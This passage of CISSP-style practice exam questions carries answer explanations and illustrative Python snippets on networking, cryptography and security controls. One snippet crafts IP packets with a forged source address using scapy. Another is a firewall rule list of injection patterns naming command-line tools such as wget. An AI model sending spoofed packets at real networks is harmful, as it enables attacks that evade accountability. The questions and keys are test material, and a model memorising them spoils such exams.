such as enhancing the confidentiality and the integrity of the system or the network, preventing or mitigating some types of attacks or vulnerabilities, and supporting the audit and the compliance activities. However, containment to prevent propagation is not the primary goal of fault tolerance, as it is not a method or a technique of adding redundant or backup components or resources to the system or the network, and it does not ensure or improve the performance or the quality of the system or the network.
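The redundancy idea can be shown in a few lines; the sketch below eliminates a single point of failure by failing over between redundant endpoints (the hostnames are placeholders):

```python
# Minimal failover: try redundant endpoints in order until one responds.
import socket

REPLICAS = ["primary.example.internal", "replica1.example.internal"]

def connect_with_failover(port: int = 443, timeout: float = 2.0) -> socket.socket:
    last_error = None
    for host in REPLICAS:
        try:
            return socket.create_connection((host, port), timeout=timeout)
        except OSError as exc:   # host down or unreachable: try the next replica
            last_error = exc
    raise ConnectionError(f"all replicas failed: {last_error}")
```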
Which of the following methods of suppressing a fire is environmentally friendly and the MOST appropriate for a data center?
Inert gas fire suppression system
Halon gas fire suppression system
Dry-pipe sprinklers
Wet-pipe sprinklers
The most environmentally friendly and appropriate method of suppressing a fire in a data center is an inert gas fire suppression system. An inert gas system is a gaseous suppression system that uses an inert gas such as nitrogen or argon (or a blend of them) to extinguish a fire by displacing the oxygen in the area and reducing the oxygen concentration below the level that supports combustion. It is environmentally friendly because it produces no harmful or toxic by-products and does not deplete the ozone layer, and it is appropriate for a data center because it does not damage electronic equipment and, as long as the oxygen level is kept above the minimum required for human survival, poses little health risk to personnel. A halon gas fire suppression system uses halon, a bromine-containing chemical compound, to extinguish a fire by interrupting the chemical reaction of combustion. Halon is not environmentally friendly: it produces harmful by-products, depletes the ozone layer, poses health risks to personnel, and is banned or restricted in many countries. Dry-pipe sprinklers fill their pipes with pressurized air or nitrogen and release water from the sprinkler heads only when a fire is detected; wet-pipe sprinklers keep the pipes filled with pressurized water at all times. Both are water-based systems that are poorly suited to a data center: discharged water can damage or destroy electronic equipment, false alarms or accidental discharges are costly, and the systems consume water and can cause pollution or contamination.
What is the MOST significant benefit of an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers?
Non-repudiation
Efficiency
Confidentiality
Privacy
The most significant benefit of an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers is non-repudiation. Non-repudiation is a security property that ensures that the parties involved in a communication or transaction cannot deny their participation or the validity of the data. Non-repudiation can provide some benefits for web security, such as enhancing the accountability and trustworthiness of the parties, preventing fraud or disputes, and enabling legal or forensic evidence. Certificate based encryption is a technique that uses digital certificates to encrypt and decrypt data. Digital certificates are issued by a trusted certificate authority (CA), and contain the public key and other information of the owner. Certificate based encryption can provide non-repudiation by using the public key and the private key of the parties to perform encryption and decryption, and by using digital signatures to verify the identity and the integrity of the data. Certificate based encryption can also provide confidentiality, integrity, and authentication for the communication. Session keys are temporary keys that are used to encrypt and decrypt data for a single session or communication. Session keys are usually randomly generated and exchanged between the parties using a key exchange protocol, such as Diffie-Hellman or RSA. Session keys can provide confidentiality and integrity for the communication, but they cannot provide non-repudiation, as the parties can deny their possession or usage of the session keys, or claim that the session keys were compromised or tampered with. Efficiency, confidentiality, and privacy are not the most significant benefits of an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers, although they may be related or useful properties. Efficiency is a performance property that measures how well a system or a process uses the available resources, such as time, space, or energy. Efficiency can be affected by various factors, such as the design, the implementation, the optimization, or the maintenance of the system or the process. Efficiency may or may not be improved by an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers, depending on the trade-offs between the security and the performance of the encryption techniques. Confidentiality is a security property that ensures that the data is only accessible or disclosed to the authorized parties. Confidentiality can be provided by both session keys and certificate based encryption, as they both use encryption to protect the data from unauthorized access or disclosure. However, confidentiality is not the most significant benefit of an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers, as it is not a new or enhanced property that is introduced by the upgrade. Privacy is a security property that ensures that the personal or sensitive information of the parties is protected from unauthorized collection, processing, or sharing. Privacy can be affected by various factors, such as the policies, the regulations, the technologies, or the behaviors of the parties involved in the communication or transaction. 
Privacy may or may not be improved by an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers, depending on the type and the amount of information that is encrypted and transmitted. However, privacy is not the most significant benefit of an application upgrade that replaces randomly generated session keys with certificate based encryption for communications with backend servers, as it is not a direct or specific property that is provided by the encryption techniques.
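To illustrate why certificates enable non-repudiation where shared session keys do not, here is a minimal signing sketch with the third-party cryptography package and Ed25519; in practice the public key would be distributed inside a CA-issued certificate:

```python
# Non-repudiation rests on signatures made with a private key only one party holds.
# pip install cryptography
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

private_key = Ed25519PrivateKey.generate()  # held only by the signer
public_key = private_key.public_key()       # published, e.g., via a certificate

message = b"transfer 100 units to account 42"
signature = private_key.sign(message)

try:
    public_key.verify(signature, message)   # raises if message or signature altered
    print("signature valid: the signer cannot plausibly deny producing it")
except InvalidSignature:
    print("signature invalid")
```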
Which of the following access management procedures would minimize the possibility of an organization's employees retaining access to secure work areas after they change roles?
User access modification
User access recertification
User access termination
User access provisioning
The access management procedure that would minimize the possibility of an organization’s employees retaining access to secure work areas after they change roles is user access modification. User access modification is a process that involves changing or updating the access rights or permissions of a user account based on the user’s current role, responsibilities, or needs. User access modification can help to minimize the possibility of an organization’s employees retaining access to secure work areas after they change roles, as it can ensure that the employees only have the access that is necessary and appropriate for their new roles, and that any access that is no longer needed or authorized is revoked or removed. User access recertification, user access termination, and user access provisioning are not access management procedures that can minimize the possibility of an organization’s employees retaining access to secure work areas after they change roles, but they can help to verify, revoke, or grant the access of the user accounts, respectively. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 2: Asset Security, page 154; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 2: Asset Security, page 146.
Which of the following is used by the Point-to-Point Protocol (PPP) to determine packet formats?
Layer 2 Tunneling Protocol (L2TP)
Link Control Protocol (LCP)
Challenge Handshake Authentication Protocol (CHAP)
Packet Transfer Protocol (PTP)
Link Control Protocol (LCP) is used by the Point-to-Point Protocol (PPP) to determine packet formats. PPP is a data link layer protocol that provides a standard method for transporting network layer packets over point-to-point links, such as serial lines, modems, or dial-up connections. PPP supports various network layer protocols, such as IP, IPX, or AppleTalk, and it can encapsulate them in a common frame format. PPP also provides features such as authentication, compression, error detection, and multilink aggregation. LCP is a subprotocol of PPP that is responsible for establishing, configuring, maintaining, and terminating the point-to-point connection. LCP negotiates and agrees on various options and parameters for the PPP link, such as the maximum receive unit (MRU), the authentication method, the compression method, the error detection method, and the packet format. LCP uses a series of messages, such as configure-request, configure-ack, configure-nak, configure-reject, terminate-request, terminate-ack, code-reject, protocol-reject, echo-request, echo-reply, and discard-request, to communicate and exchange information between the PPP peers.
The other options are not used by PPP to determine packet formats, but rather for other purposes. Layer 2 Tunneling Protocol (L2TP) is a tunneling protocol that allows the creation of virtual private networks (VPNs) over public networks, such as the Internet. L2TP encapsulates PPP frames in IP datagrams and sends them across the tunnel between two L2TP endpoints. L2TP does not determine the packet format of PPP, but rather uses it as a payload. Challenge Handshake Authentication Protocol (CHAP) is an authentication protocol that is used by PPP to verify the identity of the remote peer before allowing access to the network. CHAP uses a challenge-response mechanism that involves a random number (nonce) and a hash function to prevent replay attacks. CHAP does not determine the packet format of PPP, but rather uses it as a transport. Packet Transfer Protocol (PTP) is not a valid option, as there is no such protocol with this name. There is a Point-to-Point Protocol over Ethernet (PPPoE), which is a protocol that encapsulates PPP frames in Ethernet frames and allows the use of PPP over Ethernet networks. PPPoE does not determine the packet format of PPP, but rather uses it as a payload.
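The CHAP challenge-response mechanism mentioned above can be made concrete with a short sketch. Per RFC 1994, the response is the MD5 hash of the identifier, the shared secret, and the challenge concatenated; the secret value below is an illustrative assumption.

```python
# A minimal sketch of the CHAP response computation (RFC 1994): the
# shared secret never crosses the link, only a hash bound to a random
# challenge, which is what defeats replay attacks.
import hashlib
import os

shared_secret = b"example-shared-secret"  # assumed, configured on both peers

def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """Compute MD5(identifier || secret || challenge)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()

# The authenticator sends a fresh random challenge for each attempt.
identifier = 1
challenge = os.urandom(16)

# The peer computes the response; the authenticator computes the same
# value independently and compares the two.
response = chap_response(identifier, shared_secret, challenge)
expected = chap_response(identifier, shared_secret, challenge)
print("authenticated" if response == expected else "rejected")
```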
In a Transmission Control Protocol/Internet Protocol (TCP/IP) stack, which layer is responsible for negotiating and establishing a connection with another node?
Transport layer
Application layer
Network layer
Session layer
The transport layer of the Transmission Control Protocol/Internet Protocol (TCP/IP) stack is responsible for negotiating and establishing a connection with another node. The TCP/IP stack is a simplified version of the OSI model, and it consists of four layers: application, transport, internet, and link. The transport layer is the third layer of the TCP/IP stack, and it is responsible for providing reliable and efficient end-to-end data transfer between two nodes on a network. The transport layer uses protocols, such as Transmission Control Protocol (TCP) or User Datagram Protocol (UDP), to segment, sequence, acknowledge, and reassemble the data packets, and to handle error detection and correction, flow control, and congestion control. The transport layer also provides connection-oriented or connectionless services, depending on the protocol used.
TCP is a connection-oriented protocol, which means that it establishes a logical connection between two nodes before exchanging data, and it maintains the connection until the data transfer is complete. TCP uses a three-way handshake to negotiate and establish a connection with another node. The three-way handshake works as follows: first, the initiating node sends a SYN (synchronize) segment containing its initial sequence number; second, the responding node replies with a SYN-ACK segment that acknowledges the SYN and carries its own initial sequence number; third, the initiating node sends an ACK segment acknowledging the SYN-ACK, after which the connection is established and data can flow in both directions.
UDP is a connectionless protocol, which means that it does not establish or maintain a connection between two nodes, but rather sends data packets independently and without any guarantee of delivery, order, or integrity. UDP does not use a handshake or any other mechanism to negotiate and establish a connection with another node, but rather relies on the application layer to handle any connection-related issues.
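The contrast between the two transport protocols is easy to see with the standard socket module. The host and port below are illustrative assumptions; run the sketch against a listener you control.

```python
# A minimal sketch: TCP's connect() performs the three-way handshake
# before any data moves, while UDP's sendto() emits a datagram with no
# handshake and no delivery guarantee.
import socket

HOST, PORT = "127.0.0.1", 9000  # assumed local test service

# TCP: the handshake (SYN, SYN-ACK, ACK) happens inside connect().
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tcp:
    tcp.settimeout(2)
    try:
        tcp.connect((HOST, PORT))   # connection established here
        tcp.sendall(b"hello over tcp")
    except OSError as exc:
        print(f"TCP connect failed (no listener?): {exc}")

# UDP: no connection state at all; the datagram may or may not arrive,
# and nothing tells the sender either way.
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp:
    udp.sendto(b"hello over udp", (HOST, PORT))
```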
What is the purpose of an Internet Protocol (IP) spoofing attack?
To send excessive amounts of data to a process, making it unpredictable
To intercept network traffic without authorization
To disguise the destination address from a target’s IP filtering devices
To convince a system that it is communicating with a known entity
The purpose of an Internet Protocol (IP) spoofing attack is to convince a system that it is communicating with a known entity. IP spoofing is a technique that involves creating and sending IP packets with a forged source IP address, which is usually the IP address of a trusted or authorized host. IP spoofing can be used for various malicious purposes, such as bypassing IP-based authentication or filtering, launching denial-of-service (DoS) or distributed denial-of-service (DDoS) attacks while concealing the attacker's origin, and hijacking or intercepting established sessions between trusted hosts.
The purpose of IP spoofing is to convince a system that it is communicating with a known entity, because it allows the attacker to evade detection, avoid responsibility, and exploit trust relationships.
The other options are not the main purposes of IP spoofing, but rather the possible consequences or methods of IP spoofing. To send excessive amounts of data to a process, making it unpredictable is a possible consequence of IP spoofing, as it can cause a DoS or DDoS attack. To intercept network traffic without authorization is a possible method of IP spoofing, as it can be used to hijack or intercept a TCP session. To disguise the destination address from a target’s IP filtering devices is not a valid option, as IP spoofing involves forging the source address, not the destination address.
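As an illustration of the mechanics (not a recipe for any specific attack), the sketch below uses the third-party scapy library (pip install scapy) to craft a packet whose source address is forged. The addresses are from the reserved TEST-NET documentation ranges, sending raw packets typically requires root privileges, and this is assumed to run only in an isolated lab.

```python
# A minimal sketch of source-address forgery with scapy: the IP header's
# src field is simply set to another host's address.
from scapy.all import IP, TCP, send

spoofed = IP(
    src="192.0.2.99",          # forged source: a "trusted" host's address
    dst="198.51.100.10",       # the target system (lab address)
) / TCP(dport=80, flags="S")   # a TCP SYN, as in a spoofed handshake attempt

# send() emits the packet at layer 3. Note that replies go to the spoofed
# source, not the attacker, which is why pure spoofing is often "blind".
send(spoofed, verbose=False)
```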
An input validation and exception handling vulnerability has been discovered on a critical web-based system. Which of the following is MOST suited to quickly implement a control?
Add a new rule to the application layer firewall
Block access to the service
Install an Intrusion Detection System (IDS)
Patch the application source code
Adding a new rule to the application layer firewall is the most suited to quickly implement a control for an input validation and exception handling vulnerability on a critical web-based system. An input validation and exception handling vulnerability is a type of vulnerability that occurs when a web-based system does not properly check, filter, or sanitize the input data that is received from the users or other sources, or does not properly handle the errors or exceptions that are generated by the system. An input validation and exception handling vulnerability can lead to various attacks, such as SQL injection, cross-site scripting (XSS), command injection, buffer overflows, and information leakage through verbose error messages.
An application layer firewall is a device or software that operates at the application layer of the OSI model and inspects the application layer payload or the content of the data packets. An application layer firewall can provide various functions, such as inspecting and filtering application traffic for malicious or malformed content, blocking requests that match known attack signatures, enforcing protocol compliance, and logging application-level events.
Adding a new rule to the application layer firewall is the most suited option to quickly implement a control for an input validation and exception handling vulnerability on a critical web-based system, because it can prevent or reduce the impact of the attacks by filtering or blocking the malicious or invalid input data that exploit the vulnerability. For example, a new rule can be added to the application layer firewall to block or sanitize requests containing SQL injection or script patterns, to reject malformed or oversized input, or to suppress detailed error messages returned to clients, as in the sketch below.
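The following is a minimal, hypothetical sketch of the kind of rule such a firewall might apply. Real products use far richer, regularly updated rule sets; the patterns here are deliberately simplified illustrations, not production-grade filtering.

```python
# Reject input that matches common injection patterns -- the essence of a
# compensating application-layer firewall (WAF) rule.
import re

BLOCK_PATTERNS = [
    re.compile(r"('|%27)\s*(or|and)\s+\d+=\d+", re.IGNORECASE),  # naive SQLi
    re.compile(r"<\s*script", re.IGNORECASE),                    # naive XSS
    re.compile(r";\s*(rm|cat|wget)\b", re.IGNORECASE),           # cmd injection
]

def allow_request(field_value: str) -> bool:
    """Return False if the input matches any blocking rule."""
    return not any(p.search(field_value) for p in BLOCK_PATTERNS)

print(allow_request("alice"))                      # True: benign input
print(allow_request("' OR 1=1 --"))                # False: SQL injection
print(allow_request("<script>alert(1)</script>"))  # False: script injection
```

The compensating rule does not fix the underlying flaw; it buys time for the proper source-code patch described below.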
Adding a new rule to the application layer firewall can be done quickly and easily, without requiring any changes or patches to the web-based system, which can be time-consuming and risky, especially for a critical system. Adding a new rule to the application layer firewall can also be done remotely and centrally, without requiring any physical access or installation on the web-based system, which can be inconvenient and costly, especially for a distributed system.
The other options are not the most suited to quickly implement a control for an input validation and exception handling vulnerability on a critical web-based system, but rather options that have other limitations or drawbacks. Blocking access to the service is not the most suited option, because it can cause disruption and unavailability of the service, which can affect the business operations and customer satisfaction, especially for a critical system. Blocking access to the service can also be a temporary and incomplete solution, as it does not address the root cause of the vulnerability or prevent the attacks from occurring again. Installing an Intrusion Detection System (IDS) is not the most suited option, because IDS only monitors and detects the attacks, and does not prevent or respond to them. IDS can also generate false positives or false negatives, which can affect the accuracy and reliability of the detection. IDS can also be overwhelmed or evaded by the attacks, which can affect the effectiveness and efficiency of the detection. Patching the application source code is not the most suited option, because it can take a long time and require a lot of resources and testing to identify, fix, and deploy the patch, especially for a complex and critical system. Patching the application source code can also introduce new errors or vulnerabilities, which can affect the functionality and security of the system. Patching the application source code can also be difficult or impossible, if the system is proprietary or legacy, which can affect the feasibility and compatibility of the patch.
At what level of the Open System Interconnection (OSI) model is data at rest on a Storage Area Network (SAN) located?
Link layer
Physical layer
Session layer
Application layer
Data at rest on a Storage Area Network (SAN) is located at the physical layer of the Open System Interconnection (OSI) model. The OSI model is a conceptual framework that describes how data is transmitted and processed across different layers of a network. The OSI model consists of seven layers: application, presentation, session, transport, network, data link, and physical. The physical layer is the lowest layer of the OSI model, and it is responsible for the transmission and reception of raw bits over a physical medium, such as cables, wires, or optical fibers. The physical layer defines the physical characteristics of the medium, such as voltage, frequency, modulation, connectors, etc. The physical layer also deals with the physical topology of the network, such as bus, ring, star, mesh, etc.
A Storage Area Network (SAN) is a dedicated network that provides access to consolidated and block-level data storage. A SAN consists of storage devices, such as disks, tapes, or arrays, that are connected to servers or clients via a network infrastructure, such as switches, routers, or hubs. A SAN allows multiple servers or clients to share the same storage devices, and it provides high performance, availability, scalability, and security for data storage. Data at rest on a SAN is located at the physical layer of the OSI model, because it is stored as raw bits on the physical medium of the storage devices, and it is accessed by the servers or clients through the physical medium of the network infrastructure.
Which of the following factors contributes to the weakness of Wired Equivalent Privacy (WEP) protocol?
WEP uses a small range Initialization Vector (IV)
WEP uses Message Digest 5 (MD5)
WEP uses Diffie-Hellman
WEP does not use any Initialization Vector (IV)
WEP uses a small range Initialization Vector (IV) is the factor that contributes to the weakness of Wired Equivalent Privacy (WEP) protocol. WEP is a security protocol that provides encryption and authentication for wireless networks, such as Wi-Fi. WEP uses the RC4 stream cipher to encrypt the data packets, and the CRC-32 checksum to verify the data integrity. WEP also uses a shared secret key, which is concatenated with a 24-bit Initialization Vector (IV), to generate the keystream for the RC4 encryption. WEP has several weaknesses and vulnerabilities: the 24-bit IV space is so small (about 16.7 million values) that IVs repeat quickly on a busy network, and reusing an IV with the same key reuses the RC4 keystream, letting attackers recover plaintext; the IV is transmitted in cleartext, so collisions are easy to detect; weaknesses in the RC4 key scheduling algorithm allow the secret key to be recovered from enough captured packets (the FMS attack); and the linear CRC-32 checksum permits controlled modification of encrypted messages.
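Just how quickly a 24-bit IV runs out can be shown with a short birthday-bound calculation; the frame counts below are illustrative.

```python
# A minimal worked example: by the birthday bound, IV reuse (and hence
# keystream reuse) becomes likely after only a few thousand frames.
import math

IV_SPACE = 2 ** 24  # WEP's 24-bit IV: ~16.7 million possible values

def p_collision(frames: int, space: int = IV_SPACE) -> float:
    """Probability that at least two random IVs collide among `frames`."""
    log_p_unique = sum(math.log1p(-i / space) for i in range(frames))
    return 1.0 - math.exp(log_p_unique)

for frames in (1_000, 5_000, 10_000, 50_000):
    print(f"{frames:>6} frames -> P(IV reuse) = {p_collision(frames):.3f}")
# Around 5,000 frames -- seconds of traffic on a busy WLAN -- reuse is
# already more likely than not; at 50,000 it is a near certainty.
```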
WEP has been deprecated and replaced by more secure protocols, such as Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access II (WPA2), which use stronger encryption and authentication methods, such as the Temporal Key Integrity Protocol (TKIP), the Advanced Encryption Standard (AES), or the Extensible Authentication Protocol (EAP).
The other options are not factors that contribute to the weakness of WEP, but rather factors that are irrelevant or incorrect. WEP does not use Message Digest 5 (MD5), which is a hash function that produces a 128-bit output from a variable-length input. WEP does not use Diffie-Hellman, which is a method for generating a shared secret key between two parties. WEP does use an Initialization Vector (IV), which is a 24-bit value that is concatenated with the secret key.
Which of the following operates at the Network Layer of the Open System Interconnection (OSI) model?
Packet filtering
Port services filtering
Content filtering
Application access control
Packet filtering operates at the network layer of the Open System Interconnection (OSI) model. The OSI model is a conceptual framework that describes how data is transmitted and processed across different layers of a network. The OSI model consists of seven layers: application, presentation, session, transport, network, data link, and physical. The network layer is the third layer from the bottom of the OSI model, and it is responsible for routing and forwarding data packets between different networks or subnets. The network layer uses logical addresses, such as IP addresses, to identify the source and destination of the data packets, and it uses protocols, such as IP, ICMP, or ARP, to perform the routing and forwarding functions.
Packet filtering is a technique that controls the access to a network or a host by inspecting the incoming and outgoing data packets and applying a set of rules or policies to allow or deny them. Packet filtering can be performed by devices, such as routers, firewalls, or proxies, that operate at the network layer of the OSI model. Packet filtering typically examines the network layer header of the data packets, such as the source and destination IP addresses, the protocol type, or the fragmentation flags, and compares them with the predefined rules or policies. Packet filtering can also examine the transport layer header of the data packets, such as the source and destination port numbers, the TCP flags, or the sequence numbers, and compare them with the rules or policies. Packet filtering can provide a basic level of security and performance for a network or a host, but it also has some limitations, such as the inability to inspect the payload or the content of the data packets, the vulnerability to spoofing or fragmentation attacks, or the complexity and maintenance of the rules or policies.
The other options are not techniques that operate at the network layer of the OSI model, but rather at other layers. Port services filtering is a technique that controls the access to a network or a host by inspecting the transport layer header of the data packets and applying a set of rules or policies to allow or deny them based on the port numbers or the services. Port services filtering operates at the transport layer of the OSI model, which is the fourth layer from the bottom. Content filtering is a technique that controls the access to a network or a host by inspecting the application layer payload or the content of the data packets and applying a set of rules or policies to allow or deny them based on the keywords, URLs, file types, or other criteria. Content filtering operates at the application layer of the OSI model, which is the seventh and the topmost layer. Application access control is a technique that controls the access to a network or a host by inspecting the application layer identity or the credentials of the users or the processes and applying a set of rules or policies to allow or deny them based on the roles, permissions, or other attributes. Application access control operates at the application layer of the OSI model, which is the seventh and the topmost layer.
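A minimal, hypothetical sketch of the packet-filtering logic follows: rules match on header fields and the first match decides. The addresses and rules are illustrative assumptions, not any vendor's syntax.

```python
# First-match packet filtering on network/transport layer header fields,
# with an implicit default deny -- the core of a packet-filtering device.
import ipaddress
from dataclasses import dataclass
from typing import Optional

@dataclass
class Rule:
    action: str              # "allow" or "deny"
    src: str                 # source network in CIDR notation
    protocol: str            # "tcp", "udp", or "any"
    dst_port: Optional[int]  # None matches any port

RULES = [
    Rule("allow", "192.0.2.0/24", "tcp", 443),   # internal hosts to HTTPS
    Rule("deny",  "0.0.0.0/0",    "any", None),  # default deny
]

def filter_packet(src_ip: str, protocol: str, dst_port: int) -> str:
    """Return the action of the first rule matching the packet headers."""
    for rule in RULES:
        if (ipaddress.ip_address(src_ip) in ipaddress.ip_network(rule.src)
                and rule.protocol in ("any", protocol)
                and rule.dst_port in (None, dst_port)):
            return rule.action
    return "deny"  # nothing matched: implicit default deny

print(filter_packet("192.0.2.10", "tcp", 443))    # allow
print(filter_packet("198.51.100.7", "tcp", 443))  # deny
```

Note that the rules never look at the packet payload, which is exactly the limitation the preceding paragraph describes.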
An external attacker has compromised an organization’s network security perimeter and installed a sniffer onto an inside computer. Which of the following is the MOST effective layer of security the organization could have implemented to mitigate the attacker’s ability to gain further information?
Implement packet filtering on the network firewalls
Install Host Based Intrusion Detection Systems (HIDS)
Require strong authentication for administrators
Implement logical network segmentation at the switches
Implementing logical network segmentation at the switches is the most effective layer of security the organization could have implemented to mitigate the attacker’s ability to gain further information. Logical network segmentation is the process of dividing a network into smaller subnetworks or segments based on criteria such as function, location, or security level. Logical network segmentation can be implemented at the switches, which are devices that operate at the data link layer of the OSI model and forward data packets based on the MAC addresses. Logical network segmentation can provide several benefits, such as reducing the size of broadcast domains and network congestion, isolating sensitive or critical systems from general-purpose ones, containing the spread of a compromise to the affected segment, and simplifying the enforcement of access and security policies.
Logical network segmentation can mitigate the attacker’s ability to gain further information by limiting the visibility and access of the sniffer to the segment where it is installed. A sniffer is a tool that captures and analyzes the data packets that are transmitted over a network. A sniffer can be used for legitimate purposes, such as troubleshooting, testing, or monitoring the network, or for malicious purposes, such as eavesdropping, stealing, or modifying the data. A sniffer can only capture the data packets that are within its broadcast domain, which is the set of devices that can communicate with each other without a router. By implementing logical network segmentation at the switches, the organization can create multiple broadcast domains and isolate the sensitive or critical data from the compromised segment. This way, the attacker can only see the data packets that belong to the same segment as the sniffer, and not the data packets that belong to other segments. This can prevent the attacker from gaining further information or accessing other resources on the network.
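The isolation argument can be sketched in a few lines; the segment names, subnets, and addresses below are illustrative assumptions.

```python
# A minimal sketch of why segmentation blunts a sniffer: hosts in
# different segments share no broadcast domain, so their traffic never
# reaches the compromised machine's interface.
import ipaddress

SEGMENTS = {
    "vlan10-workstations": ipaddress.ip_network("10.0.10.0/24"),
    "vlan20-finance":      ipaddress.ip_network("10.0.20.0/24"),
}

def same_segment(ip_a: str, ip_b: str) -> bool:
    """True only if both hosts fall inside the same segment."""
    return any(
        ipaddress.ip_address(ip_a) in net and ipaddress.ip_address(ip_b) in net
        for net in SEGMENTS.values()
    )

sniffer, finance_server = "10.0.10.55", "10.0.20.8"
# Different broadcast domains: the sniffer cannot capture finance traffic.
print(same_segment(sniffer, finance_server))  # False
```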
The other options are not the most effective layers of security the organization could have implemented to mitigate the attacker’s ability to gain further information, but rather layers that have other limitations or drawbacks. Implementing packet filtering on the network firewalls is not the most effective layer of security, because packet filtering only examines the network layer header of the data packets, such as the source and destination IP addresses, and does not inspect the payload or the content of the data. Packet filtering can also be bypassed by using techniques such as IP spoofing or fragmentation. Installing Host Based Intrusion Detection Systems (HIDS) is not the most effective layer of security, because HIDS only monitors and detects the activities and events on a single host, and does not prevent or respond to the attacks. HIDS can also be disabled or evaded by the attacker if the host is compromised. Requiring strong authentication for administrators is not the most effective layer of security, because authentication only verifies the identity of the users or processes, and does not protect the data in transit or at rest. Authentication can also be defeated by using techniques such as phishing, keylogging, or credential theft.
Which of the following is the BEST network defense against unknown types of attacks or stealth attacks in progress?
Intrusion Prevention Systems (IPS)
Intrusion Detection Systems (IDS)
Stateful firewalls
Network Behavior Analysis (NBA) tools
Network Behavior Analysis (NBA) tools are the best network defense against unknown types of attacks or stealth attacks in progress. NBA tools are devices or software that monitor and analyze the network traffic and activities, and detect any anomalies or deviations from the normal or expected behavior. NBA tools use various techniques, such as statistical analysis, machine learning, artificial intelligence, or heuristics, to establish a baseline of the network behavior, and to identify any outliers or indicators of compromise. NBA tools can provide several benefits, such as detecting zero-day or previously unknown attacks for which no signature exists, spotting slow or stealthy activity that deviates from the established baseline, revealing insider misuse or compromised hosts, and complementing signature-based defenses such as IDS and IPS.
The other options are not the best network defense against unknown types of attacks or stealth attacks in progress, but rather network defenses that have other limitations or drawbacks. Intrusion Prevention Systems (IPS) are devices or software that monitor and block the network traffic and activities that match the predefined signatures or rules of known attacks. IPS can provide a proactive and preventive layer of security, but they cannot detect or stop unknown types of attacks or stealth attacks that do not match any signatures or rules, or that can evade or disable the IPS. Intrusion Detection Systems (IDS) are devices or software that monitor and alert the network traffic and activities that match the predefined signatures or rules of known attacks. IDS can provide a reactive and detective layer of security, but they cannot detect or alert unknown types of attacks or stealth attacks that do not match any signatures or rules, or that can evade or disable the IDS. Stateful firewalls are devices or software that filter and control the network traffic and activities based on the state and context of the network sessions, such as the source and destination IP addresses, port numbers, protocol types, and sequence numbers. Stateful firewalls can provide a granular and dynamic layer of security, but they cannot filter or control unknown types of attacks or stealth attacks that use valid or spoofed network sessions, or that can exploit or bypass the firewall rules.
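The baseline-and-deviation idea behind NBA can be reduced to a toy sketch. The traffic numbers are invented for illustration, and real NBA products model many features (flows, ports, timing, peer sets), not a single counter.

```python
# A minimal sketch of behavioral anomaly detection: learn what "normal"
# traffic volume looks like, then flag observations far outside it --
# no attack signature required.
from statistics import mean, stdev

# Bytes per minute observed during a "normal" training window (assumed).
baseline = [1200, 1350, 1280, 1400, 1190, 1330, 1270, 1310]
mu, sigma = mean(baseline), stdev(baseline)

def is_anomalous(observation: float, threshold: float = 3.0) -> bool:
    """Flag traffic more than `threshold` standard deviations from normal."""
    return abs(observation - mu) > threshold * sigma

for obs in (1290, 1425, 9800):  # the last value mimics bulk exfiltration
    label = "ANOMALY" if is_anomalous(obs) else "normal"
    print(f"{obs:>5} bytes/min -> {label}")
```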